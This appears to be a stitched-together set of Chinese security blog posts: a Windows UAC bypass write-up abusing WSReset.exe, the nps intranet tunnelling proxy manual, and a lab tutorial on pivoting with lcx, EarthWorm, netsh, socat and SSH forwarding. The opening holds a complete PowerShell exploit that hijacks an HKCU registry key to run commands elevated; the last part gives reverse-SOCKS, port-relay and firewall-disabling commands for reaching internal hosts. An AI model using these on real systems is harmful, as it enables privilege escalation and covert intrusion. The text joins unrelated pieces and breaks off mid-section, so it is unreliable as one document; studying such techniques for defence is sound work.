环境

win10 1909 18363.535 Pro

复现

利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true

使用Procmon64.exe添加过滤条件

没找到 HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

根据微软文档可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。

<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}

在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。

参考

1. https://www.activecyber.us/activelabs/windows-uac-bypass
2. https://github.com/sailay1996/UAC_Bypass_In_The_Wild

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。

背景

1. 做微信公众号开发、小程序开发等—-> 域名代理模式

2. 想在外网通过ssh连接内网的机器，做云服务器到内网服务器端口的映射，—-> tcp代理模式

3. 在非内网环境下使用内网dns，或者需要通过udp访问内网机器等—-> udp代理模式

4. 在外网使用HTTP代理访问内网站点—-> http代理模式

5. 搭建一个内网穿透ss，在外网如同使用内网vpn一样访问内网资源或者设备—-> socks5代理模式

安装

releases安装

releases

下载对应的系统版本即可，服务端和客户端是单独的

源码安装

• 安装源码
  > go get -u github.com/cnlh/nps…
• 编译
  > go build cmd/nps/nps.go

go build cmd/npc/npc.go

使用示例

统一准备工作（必做）

• 开启服务端，假设公网服务器ip为1.1.1.1，配置文件中bridge_port为8284，配置文件中web_port为8080
• 访问1.1.1.1:8080
• 在客户端管理中创建一个客户端，记录下验证密钥
• 内网客户端运行（windows使用cmd运行加.exe）

./npc -server=1.1.1.1:8284 -vkey=客户端的密钥

域名解析

适用范围： 小程序开发、微信公众号开发、产品演示

假设场景：
– 有一个域名proxy.com，有一台公网机器ip为1.1.1.1
– 两个内网开发站点127.0.0.1:81，127.0.0.1:82
– 想通过（http|https://）a.proxy.com访问127.0.0.1:81，通过（http|https://）b.proxy.com访问127.0.0.1:82

使用步骤
– 将*.proxy.com解析到公网服务器1.1.1.1
– 点击刚才创建的客户端的域名管理，添加两条规则规则：1、域名：a.proxy.com，内网目标：127.0.0.1:81，2、域名：b.proxy.com，内网目标：127.0.0.1:82

现在访问（http|https://）/a.proxy.com，b.proxy.com即可成功

https: 如需使用https请进行相关配置，详见 使用https

tcp隧道

适用范围： ssh、远程桌面等tcp连接场景

假设场景：
想通过访问公网服务器1.1.1.1的8001端口，连接内网机器10.1.50.101的22端口，实现ssh连接

使用步骤
– 在刚才创建的客户端隧道管理中添加一条tcp隧道，填写监听的端口（8001）、内网目标ip和目标端口（10.1.50.101:22），保存。
– 访问公网服务器ip（1.1.1.1）,填写的监听端口(8001)，相当于访问内网ip(10.1.50.101):目标端口(22)，例如：ssh -p 8001 root@1.1.1.1

udp隧道

适用范围： 内网dns解析等udp连接场景

假设场景：
内网有一台dns（10.1.50.102:53），在非内网环境下想使用该dns，公网服务器为1.1.1.1

使用步骤
– 在刚才创建的客户端的隧道管理中添加一条udp隧道，填写监听的端口（53）、内网目标ip和目标端口（10.1.50.102:53），保存。
– 修改需要使用的内网dns为127.0.0.1，则相当于使用10.1.50.202作为dns服务器

socks5代理

适用范围： 在外网环境下如同使用vpn一样访问内网设备或者资源

假设场景：
想将公网服务器1.1.1.1的8003端口作为socks5代理，达到访问内网任意设备或者资源的效果

使用步骤
– 在刚才创建的客户端隧道管理中添加一条socks5代理，填写监听的端口（8003），保存。
– 在外网环境的本机配置socks5代理(例如使用proxifier进行全局代理)，ip为公网服务器ip（1.1.1.1），端口为填写的监听端口(8003)，即可畅享内网了

http正向代理

适用范围： 在外网环境下使用http正向代理访问内网站点

假设场景：
想将公网服务器1.1.1.1的8004端口作为http代理，访问内网网站

使用步骤

• 在刚才创建的客户端隧道管理中添加一条http代理，填写监听的端口（8004），保存。
• 在外网环境的本机配置http代理，ip为公网服务器ip（1.1.1.1），端口为填写的监听端口(8004)，即可访问了

私密代理

适用范围： 无需占用多余的端口、安全性要求较高可以防止其他人连接的tcp服务，例如ssh。

假设场景：
无需新增多的端口实现访问内网服务器10.1.50.2的22端口

使用步骤
– 在刚才创建的客户端中添加一条私密代理，并设置唯一密钥secrettest和内网目标10.1.50.2:22
– 在需要连接ssh的机器上以执行命令

./npc -server=1.1.1.1:8284 -vkey=vkey -type=tcp -password=secrettest -local_type=secret

如需指定本地端口可加参数-local_port=xx，默认为2000

注意： password为web管理上添加的唯一密钥，具体命令可查看web管理上的命令提示

假设10.1.50.2用户名为root，现在执行ssh -p 2000 root@1.1.1.1即可访问ssh

p2p服务

适用范围： 大流量传输场景，流量不经过公网服务器，但是由于p2p穿透和nat类型关系较大，不保证100%成功，支持大部分nat类型。nat类型检测

假设场景：
内网1机器ip为10.1.50.2 内网2机器2 ip为10.2.50.2

想通过访问内网1机器1的2000端口—->访问到内网2机器3 10.2.50.3的22端口

使用步骤
– 在nps.conf中设置p2p_ip（nps服务器ip）和p2p_port（nps服务器udp端口）
– 在刚才刚才创建的客户端中添加一条p2p代理，并设置唯一密钥p2pssh
– 在机器1执行命令

./npc -server=1.1.1.1:8284 -vkey=123 -password=p2pssh -target=10.2.50.3:22

如需指定本地端口可加参数-local_port=xx，默认为2000

注意： password为web管理上添加的唯一密钥，具体命令可查看web管理上的命令提示

假设机器3用户名为root，现在在机器1上执行ssh -p 2000 root@127.0.0.1即可访问机器2的ssh

web管理

介绍

可在网页上配置和管理各个tcp、udp隧道、内网站点代理，http、https解析等，功能强大，操作方便。

提示：使用web模式时，服务端执行文件必须在项目根目录，否则无法正确加载配置文件

启动

服务端测试

 ./nps test

如有错误请及时修改配置文件，无错误可继续进行下去

服务端启动

 ./nps start

如果无需daemon运行或者打开后无法正常访问web管理，去掉start查看日志运行即可

web管理

进入web界面，公网ip:web界面端口（默认8080），密码默认为123

进入web管理界面，有详细的说明

服务端配置文件重载

如果是daemon启动

 ./nps reload

说明： 仅支持部分配置重载，例如allow_user_login auth_crypt_key auth_key web_username web_password 等，未来将支持更多

服务端停止或重启

如果是daemon启动

 ./nps stop|restart

服务端配置文件

• /conf/nps.conf

使用https

方式一： 类似于nginx实现https的处理

在配置文件中将https_proxy_port设置为443或者其他你想配置的端口，和在web中对应域名编辑中设置对应的证书路径，将https_just_proxy设置为false，然后就和http代理一样了

此外： 可以在nps.conf中设置一个默认的https配置，当遇到未在web中设置https证书的域名解析时，将自动使用默认证书，另还有一种情况就是对于某些请求的clienthello不携带sni扩展信息，nps也将自动使用默认证书

方式二： 在内网对应服务器上设置https

在nps.conf中将https_just_proxy设置为true，并且打开https_proxy_port端口，然后nps将直接转发https请求到内网服务器上，由内网服务器进行https处理

与nginx配合

有时候我们还需要在云服务器上运行nginx来保证静态文件缓存等，本代理可和nginx配合使用，在配置文件中将httpProxyPort设置为非80端口，并在nginx中配置代理，例如httpProxyPort为8024时

server {
    listen 80;
    server_name *.proxy.com;
    location / {
        proxy_set_header Host  $http_host;
        proxy_pass http://127.0.0.1:8024;/
    }
}

如需使用https也可在nginx监听443端口并配置ssl，并将本代理的httpsProxyPort设置为空关闭https即可，例如httpProxyPort为8024时

server {
    listen 443;
    server_name *.proxy.com;
    ssl on;
    ssl_certificate  certificate.crt;
    ssl_certificate_key private.key;
    ssl_session_timeout 5m;
    ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD5:!ADH:!RC4;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_prefer_server_ciphers on;
    location / {
        proxy_set_header Host  $http_host;
        proxy_pass http://127.0.0.1:8024;/
    }
}

关闭代理

如需关闭http代理可在配置文件中将http_proxy_port设置为空，如需关闭https代理可在配置文件中将https_proxy_port设置为空。

将nps安装到系统

如果需要长期并且方便的运行nps服务端，可将nps安装到操作系统中，可执行命令

(./nps|nps.exe) install

安装成功后，对于linux，darwin，将会把配置文件和静态文件放置于/etc/nps/，并将可执行文件nps复制到/usr/bin/nps或者/usr/local/bin/nps，安装成功后可在任何位置执行

nps test|start|stop|restart|status

对于windows系统，将会把配置文件和静态文件放置于C:\Program Files\nps，安装成功后可将可执行文件nps.exe复制到任何位置执行

nps.exe test|start|stop|restart|status

流量数据持久化

服务端支持将流量数据持久化，默认情况下是关闭的，如果有需求可以设置nps.conf中的flow_store_interval参数，单位为分钟

注意： nps不会持久化通过公钥连接的客户端

系统信息显示

nps服务端支持在web上显示和统计服务器的相关信息，但默认一些统计图表是关闭的，如需开启请在nps.conf中设置system_info_display=true

自定义客户端连接密钥

web上可以自定义客户端连接的密钥，但是必须具有唯一性

关闭公钥访问

可以将nps.conf中的public_vkey设置为空或者删除

关闭web管理

可以将nps.conf中的web_port设置为空或者删除

服务端多用户登陆

如果将nps.conf中的allow_user_login设置为true,服务端web将支持多用户登陆，登陆用户名为user，默认密码为每个客户端的验证密钥，登陆后可以进入客户端编辑修改web登陆的用户名和密码，默认该功能是关闭的。

用户注册功能

nps服务端支持用户注册功能，可将nps.conf中的allow_user_register设置为true，开启后登陆页将会有有注册功能，

监听指定ip

nps支持每个隧道监听不同的服务端端口,在nps.conf中设置allow_multi_ip=true后，可在web中控制，或者npc配置文件中(可忽略，默认为0.0.0.0)

server_ip=xxx

代理到服务端本地

在使用nps监听80或者443端口时，默认是将所有的请求都会转发到内网上，但有时候我们的nps服务器的上一些服务也需要使用这两个端口，nps提供类似于nginx proxy_pass 的功能，支持将代理到服务器本地，该功能支持域名解析，tcp、udp隧道，默认关闭。

即： 假设在nps的vps服务器上有一个服务使用5000端口，这时候nps占用了80端口和443，我们想能使用一个域名通过http(s)访问到5000的服务。

使用方式： 在nps.conf中设置allow_local_proxy=true，然后在web上设置想转发的隧道或者域名然后选择转发到本地选项即可成功。

客户端

客户端启动

无配置文件模式

此模式的各种配置在服务端web管理中完成,客户端除运行一条命令外无需任何其他设置

 ./npc -server=ip:port -vkey=web界面中显示的密钥

配置文件模式

此模式使用nps的公钥或者客户端私钥验证，各种配置在客户端完成，同时服务端web也可以进行管理

 ./npc -config=npc配置文件路径

配置文件说明

示例配置文件

全局配置

[common]
server_addr=1.1.1.1:8284
conn_type=tcp
vkey=123
username=111
password=222
compress=true
crypt=true
rate_limit=10000
flow_limit=100
remark=test
max_conn=10

域名代理

[common]
server_addr=1.1.1.1:8284
vkey=123
[web1]
host=a.proxy.com
target_addr=127.0.0.1:8080,127.0.0.1:8082
host_change=www.proxy.com
header_set_proxy=nps

tcp隧道模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[tcp]
mode=tcp
target_addr=127.0.0.1:8080
server_port=9001

udp隧道模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[udp]
mode=udp
target_addr=127.0.0.1:8080
server_port=9002

http代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[http]
mode=httpProxy
server_port=9003

socks5代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[socks5]
mode=socks5
server_port=9004

私密代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[secret_ssh]
mode=secret
password=ssh2
target_addr=10.1.50.2:22

p2p代理模式

[common]
server_addr=1.1.1.1:8284
vkey=123
[p2p_ssh]
mode=p2p
password=ssh2
target_addr=10.1.50.2:22

文件访问模式

利用nps提供一个公网可访问的本地文件服务，此模式仅客户端使用配置文件模式方可启动

[common]
server_addr=1.1.1.1:8284
vkey=123
[file]
mode=file
server_port=9100
local_path=/tmp/
strip_pre=/web/
````

项 | 含义
---|---
mode | file
server_port | 服务端开启的端口
local_path|本地文件目录
strip_pre|前缀

对于`strip_pre`，访问公网`ip:9100/web/`相当于访问`/tmp/`目录

#### 断线重连
```ini
[common]
auto_reconnection=true

nat类型检测

 ./npc nat

如果p2p双方都是Symmetic Nat，肯定不能成功，其他组合都有较大成功率。

状态检查

 ./npc status -config=npc配置文件路径

重载配置文件

 ./npc restart -config=npc配置文件路径

通过代理连接nps

有时候运行npc的内网机器无法直接访问外网，此时可以可以通过socks5代理连接nps

对于配置文件方式启动,设置

[common]
proxy_url=socks5://111:222@127.0.0.1:8024

对于无配置文件模式,加上参数

-proxy=socks5://111:222@127.0.0.1:8024

支持socks5和http两种模式

即socks5://username:password@ip:port

或

群晖支持

可在releases中下载spk群晖套件，例如npc_x64-6.1_0.19.0-1.spk

相关功能

缓存支持

对于web站点来说，一些静态文件往往消耗更大的流量，且在内网穿透中，静态文件还需到客户端获取一次，这将导致更大的流量消耗。nps在域名解析代理中支持对静态文件进行缓存。

即假设一个站点有a.css，nps将只需从npc客户端读取一次该文件，然后把该文件的内容放在内存中，下一次将不再对npc客户端进行请求而直接返回内存中的对应内容。该功能默认是关闭的，如需开启请在nps.conf中设置http_cache=true，并设置http_cache_length（缓存文件的个数，消耗内存，不宜过大，0表示不限制个数）

数据压缩支持

由于是内网穿透，内网客户端与服务端之间的隧道存在大量的数据交换，为节省流量，加快传输速度，由此本程序支持SNNAPY形式的压缩。

• 所有模式均支持数据压缩
• 在web管理或客户端配置文件中设置

加密传输

如果公司内网防火墙对外网访问进行了流量识别与屏蔽，例如禁止了ssh协议等，通过设置 配置文件，将服务端与客户端之间的通信内容加密传输，将会有效防止流量被拦截。
– nps使用tls加密，所以一定要保留conf目录下的密钥文件，同时也可以自行生成
– 在web管理或客户端配置文件中设置

站点保护

域名代理模式所有客户端共用一个http服务端口，在知道域名后任何人都可访问，一些开发或者测试环境需要保密，所以可以设置用户名和密码，nps将通过 Http Basic Auth 来保护，访问时需要输入正确的用户名和密码。

• 在web管理或客户端配置文件中设置

host修改

由于内网站点需要的host可能与公网域名不一致，域名代理支持host修改功能，即修改request的header中的host字段。

使用方法：在web管理中设置

自定义header

支持对header进行新增或者修改，以配合服务的需要

404页面配置

支持域名解析模式的自定义404页面，修改/web/static/page/error.html中内容即可，暂不支持静态文件等内容

流量限制

支持客户端级流量限制，当该客户端入口流量与出口流量达到设定的总量后会拒绝服务
，域名代理会返回404页面，其他代理会拒绝连接,使用该功能需要在nps.conf中设置allow_flow_limit，默认是关闭的。

带宽限制

支持客户端级带宽限制，带宽计算方式为入口和出口总和，权重均衡,使用该功能需要在nps.conf中设置allow_rate_limit，默认是关闭的。

负载均衡

本代理支持域名解析模式和tcp代理的负载均衡，在web域名添加或者编辑中内网目标分行填写多个目标即可实现轮训级别的负载均衡

端口白名单

为了防止服务端上的端口被滥用，可在nps.conf中配置allow_ports限制可开启的端口，忽略或者不填表示端口不受限制，格式：

allow_ports=9001-9009,10001,11000-12000

端口范围映射

当客户端以配置文件的方式启动时，可以将本地的端口进行范围映射，仅支持tcp和udp模式，例如：

[tcp]
mode=tcp
server_port=9001-9009,10001,11000-12000
target_port=8001-8009,10002,13000-14000

逗号分隔，可单个或者范围，注意上下端口的对应关系，无法一一对应将不能成功

端口范围映射到其他机器

[tcp]
mode=tcp
server_port=9001-9009,10001,11000-12000
target_port=8001-8009,10002,13000-14000
target_ip=10.1.50.2

填写target_ip后则表示映射的该地址机器的端口，忽略则便是映射本地127.0.0.1,仅范围映射时有效

守护进程

本代理支持守护进程，使用示例如下，服务端客户端所有模式通用,支持linux，darwin，windows。

./(nps|npc) start|stop|restart|status 若有其他参数可加其他参数

(nps|npc).exe start|stop|restart|status 若有其他参数可加其他参数

KCP协议支持

KCP 是一个快速可靠协议，能以比 TCP浪费10%-20%的带宽的代价，换取平均延迟降低 30%-40%，在弱网环境下对性能能有一定的提升。可在nps.conf中修改bridge_type为kcp
，设置后本代理将开启udp端口（bridge_port）

注意：当服务端为kcp时，客户端连接时也需要使用相同配置，无配置文件模式加上参数type=kcp,配置文件模式在配置文件中设置tp=kcp

域名泛解析

支持域名泛解析，例如将host设置为*.proxy.com，a.proxy.com、b.proxy.com等都将解析到同一目标，在web管理中或客户端配置文件中将host设置为此格式即可。

URL路由

本代理支持根据URL将同一域名转发到不同的内网服务器，可在web中或客户端配置文件中设置，此参数也可忽略，例如在客户端配置文件中

[web1]
host=a.proxy.com
target_addr=127.0.0.1:7001
location=/test
[web2]
host=a.proxy.com
target_addr=127.0.0.1:7002
location=/static

对于a.proxy.com/test将转发到web1，对于a.proxy.com/static将转发到web2

限制ip访问

如果将一些危险性高的端口例如ssh端口暴露在公网上，可能会带来一些风险，本代理支持限制ip访问。

使用方法: 在配置文件nps.conf中设置ip_limit=true，设置后仅通过注册的ip方可访问。

ip注册：

方式一：
在需要访问的机器上，运行客户端

./npc register -server=ip:port -vkey=公钥或客户端密钥 time=2

time为有效小时数，例如time=2，在当前时间后的两小时内，本机公网ip都可以访问nps代理.

方式二：
此外nps的web登陆也可提供验证的功能，成功登陆nps web admin后将自动为登陆的ip注册两小时的允许访问权限。

注意： 本机公网ip并不是一成不变的，请自行注意有效期的设置，同时同一网络下，多人也可能是在公用同一个公网ip。

客户端最大连接数

为防止恶意大量长连接，影响服务端程序的稳定性，可以在web或客户端配置文件中为每个客户端设置最大连接数。该功能针对socks5、http正向代理、域名代理、tcp代理、udp代理、私密代理生效,使用该功能需要在nps.conf中设置allow_connection_num_limit=true，默认是关闭的。

客户端最大隧道数限制

nps支持对客户端的隧道数量进行限制，该功能默认是关闭的，如需开启，请在nps.conf中设置allow_tunnel_num_limit=true。

端口复用

在一些严格的网络环境中，对端口的个数等限制较大，nps支持强大端口复用功能。将bridge_port、 http_proxy_port、 https_proxy_port 、web_port都设置为同一端口，也能正常使用。

• 使用时将需要复用的端口设置为与bridge_port一致即可，将自动识别。
• 如需将web管理的端口也复用，需要配置web_host也就是一个二级域名以便区分

多路复用

nps主要通信默认基于多路复用，无需开启。

环境变量渲染

npc支持环境变量渲染以适应在某些特殊场景下的要求。

在无配置文件启动模式下：
设置环境变量

export NPC_SERVER_ADDR=1.1.1.1:8284
export NPC_SERVER_VKEY=xxxxx

直接执行./npc即可运行

在配置文件启动模式下：

[common]
server_addr={{.NPC_SERVER_ADDR}}
conn_type=tcp
vkey={{.NPC_SERVER_VKEY}}
auto_reconnection=true
[web]
host={{.NPC_WEB_HOST}}
target_addr={{.NPC_WEB_TARGET}}

在配置文件中填入相应的环境变量名称，npc将自动进行渲染配置文件替换环境变量

健康检查

当客户端以配置文件模式启动时，支持多节点的健康检查。配置示例如下

[health_check_test1]
health_check_timeout=1
health_check_max_failed=3
health_check_interval=1
health_http_url=/
health_check_type=http
health_check_target=127.0.0.1:8083,127.0.0.1:8082

[health_check_test2]
health_check_timeout=1
health_check_max_failed=3
health_check_interval=1
health_check_type=tcp
health_check_target=127.0.0.1:8083,127.0.0.1:8082

health关键词必须在开头存在

第一种是http模式，也就是以get的方式请求目标+url，返回状态码为200表示成功

第一种是tcp模式，也就是以tcp的方式与目标建立连接，能成功建立连接表示成功

如果失败次数超过health_check_max_failed，nps则会移除该npc下的所有该目标，如果失败后目标重新上线，nps将自动将目标重新加入。

日志输出

日志输出级别

对于npc：

-log_level=0~7 -log_path=npc.log

LevelEmergency->0  LevelAlert->1

LevelCritical->2 LevelError->3

LevelWarning->4 LevelNotice->5

LevelInformational->6 LevelDebug->7

默认为全输出,级别为0到7

对于nps：

在nps.conf中设置相关配置即可

相关说明

获取用户真实ip

在域名代理模式中，可以通过request请求 header 中的 X-Forwarded-For 和 X-Real-IP 来获取用户真实 IP。

本代理前会在每一个http(s)请求中添加了这两个 header。

热更新支持

对于绝大多数配置，在web管理中的修改将实时使用，无需重启客户端或者服务端

客户端地址显示

在web管理中将显示客户端的连接地址

流量统计

可统计显示每个代理使用的流量，由于压缩和加密等原因，会和实际环境中的略有差异

当前客户端带宽

可统计每个客户端当前的带宽，可能和实际有一定差异，仅供参考。

客户端与服务端版本对比

为了程序正常运行，客户端与服务端的核心版本必须一致，否则将导致客户端无法成功连接致服务端。

webAPI

webAPI验证说明

• 采用auth_key的验证方式
• 在提交的每个请求后面附带两个参数，auth_key 和timestamp

auth_key的生成方式为：md5(配置文件中的auth_key+当前时间戳)

timestamp为当前时间戳

curl --request POST \
  --url http://127.0.0.1:8080/client/list \
  --data 'auth_key=2a0000d9229e7dbcf79dd0f5e04bb084&timestamp=1553045344&start=0&limit=10'

注意： 为保证安全，时间戳的有效范围为20秒内，所以每次提交请求必须重新生成。

获取服务端时间

由于服务端与api请求的客户端时间差异不能太大，所以提供了一个可以获取服务端时间的接口

POST /auth/gettime

获取服务端authKey

如果想获取authKey，服务端提供获取authKey的接口

POST /auth/getauthkey

将返回加密后的authKey，采用aes cbc加密，请使用与服务端配置文件中cryptKey相同的密钥进行解密

注意： nps配置文件中auth_crypt_key需为16位
– 解密密钥长度128
– 偏移量与密钥相同
– 补码方式pkcs5padding
– 解密串编码方式 十六进制

详细文档

• 此文档近期可能更新较慢，建议自行抓包

为方便第三方扩展，在web模式下可利用webAPI进行相关操作，详情见
webAPI文档

本文主要介绍几种内网中常用的端口转发以代理的几种姿势。阅读本文前请看到每个阶段的网络环境，对理解本文有重要帮助。

我们在这里用三台实验机

client ：172.16.1.1

attacker：172.16.2.18 172.16.1.144

server：172.16.2.8

我们的目的是从我们的client就可以连接上 win2008 的远程桌面。

LCX

lcx.exe有两大功能

1. 端口转发 slave和listen成对使用
2. 端口映射 tran

slave listen

server执行

lcx.exe -s 172.16.2.8 5555 127.0.0.1 3389

这句话的意思是把本机的3389端口转发到172.16.2.8的5555端口

在attacker执行

lcx.exe -l 5555 4444

这句是把本机5555接收到的数据转发到本机的4444端口

现在就可以在client上 mstsc 连接attacker的4444端口，或者直接在attacker中连接127.0.0.1:4444

整个数据的流向

client <-> 4444 attacker 5555 <->3389 server

tran

如果server中有防火墙不允许3389出站，那么可以用tran将3389映射到防火墙允许出站的端口，比如53端口。

server执行

lcx -t 53 172.16.2.8 3389

直接连接server:53

数据流向

server 3389 <-> 53 <->client

Earthworm

EW 是一套便携式的网络穿透工具，具有 SOCKS v5 服务架设和端口转发两大核心功能。该工具能够以 “正向”、“反向”、“多级级联” 等方式打通一条网络隧道，直达网络深处，用蚯蚓独有的手段突破网络限制，给防火墙松土。工具包中提供了多种可执行文件，以适用不同的操作系统，Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。官方地址：http://rootkiter.com/EarthWorm

该工具共有 6 种命令格式：ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran

正向socks5

attacker:

ew -s ssocksd -l 1080

client:

C:\Users\Y4er>curl http://172.16.2.8/ -x socks5://172.16.1.144:1080
I am 172.16.2.8

数据流向

client <-> attacker 1080 <-> server

反向socks5

attacker执行，监听8888端口转发到1080端口

ew -s rcsocks -l 1080 -e 8888

在server中启动socks5服务，并且反弹到attacker的8888端口

ew -s rssocks -d 172.16.2.18 -e 8888

在client中就可以用这个代理了

curl http://172.16.2.8/ -x socks5://172.16.1.144:1080

client <-> attacker 1080 <-> attacker 8888 <-> server

端口转发

这里着重说一下lcx_tran、lcx_listen、lcx_slave的用法。

案例一：

在attacker中启动一个socks5代理，端口是9999

ew -s ssocksd -l 9999

然后通过lcx_tran来转发9999到1080

ew.exe -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

然后就能从client访问server了

curl http://172.16.2.8/ -x socks5://172.16.1.144:1080

实际上还是用attacker搭了一个socks5代理，这个例子主要说的是lcx_tran的使用方法。

案例二：
attacker:

ew.exe -s lcx_listen -l 1234 -e 8888

server:

ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 127.0.0.1 -g 3389

原理和lcx一样

多级级联

假如我们当前的网络环境如下

a: 192.168.1.100
b: 192.168.1.101,10.0.0.1
c: 10.0.0.2,172.16.0.1
d: 172.16.0.2

那么我们怎么做才能让a访问到d的资源呢？

ew提供了多级级联

a: ew.exe -s lcx_listen -l 1080 -e 8888
b: ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 10.0.0.2  -g 9999
c: ew.exe -s lcx_tran -l 9999 -f 172.16.0.2 -g 3389

数据流向

a 1080 <-> a 8888 <-> b 9999 <-> c 9999 <-> d 3389

netsh

netsh(Network Shell) 是一个windows系统本身提供的功能强大的网络配置命令行工具。

https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-contexts

netsh添加规则

netsh interface portproxy set v4tov4 listenaddress=172.16.1.144  listenport=4444 connectaddress=172.16.2.8 connectport=3389

将172.16.1.144的4444端口映射到172.16.2.8的3389

查看规则

C:\Users\Administrator\Desktop>netsh interface portproxy show all

侦听 ipv4:                 连接到 ipv4:

地址            端口        地址            端口
--------------- ----------  --------------- ----------
172.16.1.144    4444        172.16.2.8      3389

删除规则

netsh interface portproxy delete v4tov4 listenaddress=172.16.1.144 listenport=4444

关闭防火墙

netsh firewall set opmode disabled

sSocks

sSocks是一个socks代理工具套装，可用来开启socks代理服务，支持socks5验证，支持IPV6和UDP，并提供反向socks代理服务，即将远程计算机作为socks代理服务端，反弹回本地，极大方便内网的渗透测试。官方地址：http://sourceforge.net/projects/ssocks/

使用方法类似ew

attacker

rcsocks -l 4444 -p 5555 -vv

server

rssocks –vv –s 172.16.2.8:5555

client

curl 172.16.2.8 -x socks5://172.16.1.144:4444

portfwd

portfwd是一款强大的端口转发工具，支持TCP，UDP，支持IPV4–IPV6的转换转发。

portfwd是meterpreter中内置的功能，也有单机exe版本的https://github.com/rssnsj/portfwd

较为简单，不举例了。

以上我们将的都是win平台下的tcp端口转发，接下来我们看Linux平台下的。

改变下我们当前的网络结构

win10 client:172.16.1.1

kali attacker:172.16.1.141 172.16.2.19

win2008 server:172.16.2.8

我们现在的目的是通过kali的转发来使client连接到server的3389

socat

socat是一个多功能的网络工具，名字来由是” Socket CAT”，可以看作是netcat的N倍加强版，socat的官方网站：http://www.dest-unreach.org/socat/

socat的主要特点就是在两个数据流之间建立通道，且支持众多协议和链接方式：ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl,socket等。

端口转发

socat TCP4-LISTEN:4444 TCP4:172.16.2.8:3389

client连接172.16.1.141:4444就是连接server的3389

如果需要使用并发连接，则加一个fork,如下:

socat TCP4-LISTEN:4444,fork TCP4:172.16.2.8:3389

端口映射

在一个NAT环境，如何从外部连接到内部的一个端口呢？只要能够在内部运行socat就可以了。

attacker

socat tcp-listen:1234 tcp-listen:3389 

server

socat tcp:172.16.2.19:1234 tcp:172.16.2.8:3389

这样，你外部机器上的3389就映射在内部网172.16.2.8的3389端口上。

mstsc 172.16.1.141:3389

参考倾旋师傅的文章https://payloads.online/tools/socat

我们再来看看基于ssh协议的端口转发，环境跟上文一样。

ssh

SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据。但是，SSH 还同时提供了一个非常有用的功能，这就是端口转发。它能够将其他 TCP 端口的网络数据通过 SSH 链接来转发，并且自动提供了相应的加密及解密服务。

https://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html

SSH 端口转发能够提供两大功能：

1. 加密 SSH Client 端至 SSH Server 端之间的通讯数据。
2. 突破防火墙的限制完成一些之前无法建立的 TCP 连接。

参数：

-C Enable compression.

压缩数据传输。

-N Do not execute a shell or command.
不执行脚本或命令，通常与-f连用。

-g Allow remote hosts to connect to forwarded ports.
在-L/-R/-D参数中，允许远程主机连接到建立的转发的端口，如果不加这个参数，只允许本地主机建立连接。

-f Fork into background after authentication.
后台认证用户/密码，通常和-N连用，不用登录到远程主机。

本地端口转发

所谓本地端口转发，就是将发送到本地端口的请求，转发到目标端口。这样，就可以通过访问本地端口，来访问目标端口的服务。

client(win10有ssh命令)

ssh -CfNg -L 4444:172.16.2.8:3389 root@172.16.1.141

此时client去连接localhost:4444就是server:3389

远程端口转发

所谓远程端口转发，就是将发送到远程端口的请求，转发到目标端口。这样，就可以通过访问远程端口，来访问目标端口的服务。

client

ssh -CfNg -R 4444:172.16.1.1:3389 root@172.16.1.141

此时client去连接localhost:4444就是server:3389

本地转发与远程转发的对比

